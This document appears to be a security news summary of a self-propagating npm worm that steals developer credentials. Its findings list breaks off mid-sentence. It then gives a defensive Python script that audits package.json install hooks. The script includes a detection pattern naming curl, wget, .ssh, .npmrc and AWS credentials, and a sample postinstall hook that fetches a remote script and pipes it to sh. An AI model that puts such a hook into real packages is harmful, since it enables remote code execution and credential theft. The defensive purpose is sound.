Key Findings

- Self-propagating worm dubbed CanisterSprawl detected in six npm packages, spreading via stolen developer credentials
- Malware executes during package installation to harvest npm tokens, SSH keys, cloud credentials, and browser data
- Stolen tokens enable attackers to push poisoned package versions, creating a self-replicating supply chain attack
- Exfiltration occurs through HTTPS webhook and ICP canister infrastructure designed to resist takedowns
- Campaign includes c
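Install-time execution in npm means lifecycle hooks (preinstall, install, postinstall, prepare) in a package's package.json, so a quick defensive check is to audit every manifest in a dependency tree for such hooks before they run. The following auditor is an added example, not code from the article or from any affected package; the manifests it scans are constructed samples and the `example.invalid` URL is a placeholder.

```python
"""Audit npm package manifests for install-time lifecycle scripts."""
from __future__ import annotations

import json
import re
from pathlib import Path

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Commands that commonly appear in benign native-build hooks.
BENIGN = re.compile(r"^(node-gyp|prebuild-install|node-pre-gyp)\b")
# Patterns worth a human look: remote fetches piped to a shell, inline JS,
# encoded payloads, references to credential stores.
SUSPICIOUS = re.compile(
    r"curl|wget|\|\s*(sh|bash)\b|node\s+-e|eval\(|base64|"
    r"child_process|\.ssh|\.npmrc|aws/credentials",
    re.IGNORECASE,
)


def audit_manifest(manifest_text: str, name_hint: str = "?") -> list[dict]:
    """Return one finding per install-time hook in a package.json string."""
    pkg = json.loads(manifest_text)
    findings = []
    for hook, cmd in pkg.get("scripts", {}).items():
        if hook not in INSTALL_HOOKS:
            continue
        level = "info" if BENIGN.match(cmd.strip()) else "review"
        if SUSPICIOUS.search(cmd):
            level = "suspicious"
        findings.append({"package": pkg.get("name", name_hint),
                         "hook": hook, "command": cmd, "level": level})
    return findings


def audit_tree(root: Path) -> list[dict]:
    """Walk a node_modules directory and audit every package.json found."""
    out = []
    for manifest in root.rglob("package.json"):
        try:
            out.extend(audit_manifest(manifest.read_text(), str(manifest.parent)))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest; skip, do not crash
    return out


# Constructed manifests for demonstration only; not real packages.
SAMPLE_NATIVE = json.dumps({"name": "native-addon",
                            "scripts": {"install": "node-gyp rebuild"}})
SAMPLE_BAD = json.dumps({"name": "example-pkg",
                         "scripts": {"postinstall": "curl -s https://example.invalid/s | sh"}})

if __name__ == "__main__":
    for m in (SAMPLE_NATIVE, SAMPLE_BAD):
        for f in audit_manifest(m):
            print(f"[{f['level']}] {f['package']} {f['hook']}: {f['command']}")
```

Run `audit_tree(Path("node_modules"))` after an install done with `npm ci --ignore-scripts` to review hooks before allowing them to execute.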